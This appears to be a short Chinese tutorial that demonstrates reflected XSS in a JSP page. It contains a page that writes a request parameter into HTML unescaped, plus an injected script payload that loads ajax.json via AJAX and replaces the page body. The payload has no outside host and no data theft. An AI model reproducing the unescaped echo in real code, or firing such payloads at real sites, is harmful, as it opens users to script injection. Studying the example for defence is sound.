一、原始的ajax
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %>
<!DOCTYPE html>
<html>
<head>
<title>ajax</title>
</head>
<body>
<!--
http://127.0.0.1:9999/ajax.jsp
-->
<div id="myDiv"><h2>装数据的盒子</h2></div>
<button type="button" onclick="loadXMLDoc()">请求数据</button>
<script>
function loadXMLDoc() {
// 创建 XMLHttpRequest对象
var xmlhttp = new XMLHttpRequest();
// 接收 json 响应
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
var result = JSON.parse(this.responseText);
myCallBackFunction(result)
}
}
// 定义请求
xmlhttp.open("GET", "ajax.json", true);
xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
// 发送请求
xmlhttp.send();
}
// 回调函数
function myCallBackFunction(result) {
document.getElementById("myDiv").innerHTML = result;
}
</script>
</body>
</html>
"中华人民共和国"
二、XSS注入ajax代码执行post请求
1、存在XSS漏洞的页面
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %> <!DOCTYPE html> <html> <body> <form action="" method="get"> 姓名:<input name="name" type="text"> <button type="submit">提交</button> </form> <% String name = request.getParameter("name"); if (name != null && name != "") { out.write(name); } %> </body> </html>
2、payload
<script>function f(){var xmlhttp=new XMLHttpRequest();xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4&&xmlhttp.status==200){var r=JSON.parse(this.responseText);b(r)}};xmlhttp.open("GET","ajax.json",true);xmlhttp.setRequestHeader("Content-Type","application/json;charset=UTF-8");xmlhttp.send();}function b(r){document.body.innerHTML=r;}f();</script>
payload原始代码:
<script>
function f() {
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
var r = JSON.parse(this.responseText);
b(r)
}
};
xmlhttp.open("GET", "ajax.json", true);
xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xmlhttp.send();
}
function b(r) {
document.body.innerHTML = r;
}
f();
</script>
3、后台数据库文件 ajax.json
"中华人民共和国"